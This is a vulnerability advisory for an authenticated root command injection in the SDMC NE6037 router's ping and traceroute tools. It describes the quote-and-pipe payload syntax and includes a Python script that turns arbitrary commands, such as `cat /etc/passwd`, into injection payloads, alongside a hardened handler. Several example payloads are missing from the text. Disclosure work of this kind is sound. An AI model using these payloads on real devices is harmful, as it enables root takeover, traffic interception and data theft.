
CVE-2025-8890 Authenticated RCE in SDMC NE6037 router

Grzegorz Bronka

Introduction

While testing the connectivity features of the SDMC NE6037 router, entering a single quote character into the target field of the "ping" utility produced an error message that indicated the input was reaching a shell unescaped, i.e. a Remote Code Execution (RCE) vulnerability.

It is quite common to find RCE vulnerabilities in routers' connectivity tools (such as ping or traceroute): the user-supplied target is concatenated, without sanitization, into a shell command string that is then executed. This was confirmed to be the root cause in this instance.

Affected versions

Versions before 7.1.12.2.44 are affected.

Prerequisites

  • Local network access to the router.

  • Valid administrator credentials.

PoC

  1. Log in to the router’s HTTP interface.

  2. Navigate to Diagnostic Tools. Both Ping and Traceroute utilities are vulnerable.

  3. In the target address field, input the following payload:

Any command on the router can be executed as follows:

  • The command must start with a single quote, a vertical bar and another single quote: '|'

  • Every space in the command must be enclosed in two single quotes: ' ' (otherwise the shell treats the whole injected command as one quoted word and fails to find a program of that name)

For example:

Becomes:

Example output:

Example of pwd command injection:

The whoami command returned root, so injected commands run as the root user.
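The quoting rules above, as an added example that is not part of the original advisory and not the router's firmware code: a Python script that builds the payload from an arbitrary command, runs it through a shell to show why the `' '` trick around spaces is needed, and contrasts the vulnerable handler with a hardened one (allow-list validation plus an argv list, so no shell ever parses the target). It assumes a server-side template of the shape `ping -c 1 '<target>'`, which is an inference from the quoting rules, since the firmware's actual command string is not on the page. A stand-in `ping` script is constructed in a temporary directory so the demo never touches the network.

```python
import functools
import os
import re
import stat
import subprocess
import tempfile

# Assumed server-side template (not taken from the router's firmware): the
# handler wraps the user-supplied target in single quotes and hands the whole
# string to /bin/sh. The advisory's quoting rules only make sense against a
# template of this shape.
VULNERABLE_TEMPLATE = "ping -c 1 '{target}'"


def build_payload(command: str) -> str:
    """Rewrite a shell command into the advisory's payload form.

    The leading '|' closes the quote the template opened, starts a pipeline
    and re-opens a quote; every space becomes "' '" so that a closing and a
    re-opening quote land around it and the shell splits the command into
    separate words instead of one quoted word containing spaces.
    """
    return "'|'" + command.replace(" ", "' '")


def render(target: str) -> str:
    """The command line the vulnerable handler would pass to the shell."""
    return VULNERABLE_TEMPLATE.format(target=target)


@functools.lru_cache(maxsize=None)
def _fake_ping_dir() -> str:
    """Create a directory holding a stand-in 'ping' (constructed for this
    demo) so nothing touches the network; it prints the target it was given."""
    directory = tempfile.mkdtemp(prefix="fakeping-")
    path = os.path.join(directory, "ping")
    with open(path, "w") as fh:
        fh.write('#!/bin/sh\nfor a; do last=$a; done\necho "PING $last"\n')
    os.chmod(path, stat.S_IRWXU)
    return directory


def _env() -> dict:
    env = dict(os.environ)
    env["PATH"] = _fake_ping_dir() + os.pathsep + env.get("PATH", "")
    return env


def run_vulnerable(target: str) -> str:
    """String interpolation plus shell=True: the injection succeeds."""
    result = subprocess.run(render(target), shell=True, capture_output=True,
                            text=True, env=_env())
    return result.stdout.strip()


# Allow-list of characters that may appear in a hostname or IP literal;
# quotes, pipes and spaces are rejected before anything is executed.
HOST_RE = re.compile(r"[A-Za-z0-9.:\-]{1,253}")


def run_hardened(target: str) -> str:
    """Validate the target and pass argv directly: no shell parses it."""
    if not HOST_RE.fullmatch(target):
        raise ValueError("rejected target: %r" % target)
    result = subprocess.run(["ping", "-c", "1", target], capture_output=True,
                            text=True, env=_env())
    return result.stdout.strip()


if __name__ == "__main__":
    print(render(build_payload("cat /etc/passwd")))
    # The injected echo runs; the stand-in ping's output is piped into it and dropped.
    print(run_vulnerable(build_payload("echo INJECTED OK")))
    # Naive payload: 'echo INJECTED' is looked up as a single program name and fails.
    print(repr(run_vulnerable("'|'echo INJECTED")))
    try:
        run_hardened(build_payload("id"))
    except ValueError as exc:
        print(exc)
```

Running the script prints the rendered command line `ping -c 1 ''|'cat' '/etc/passwd'`, then `INJECTED OK` from the injected echo, then an empty string for the payload that did not quote its space, and finally the rejection message from the hardened handler. The fix that matters is the argv list: once the target is a separate argument rather than part of a string handed to `sh`, the quote and pipe characters have no meaning, and the allow-list is defense in depth on top of that.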

Conclusion

The identified vulnerability permits an authenticated attacker with access to the router's management interface to execute arbitrary commands as root on the device. This enables attacks such as interception of network traffic passing through the router or unauthorized access to sensitive router configuration data.
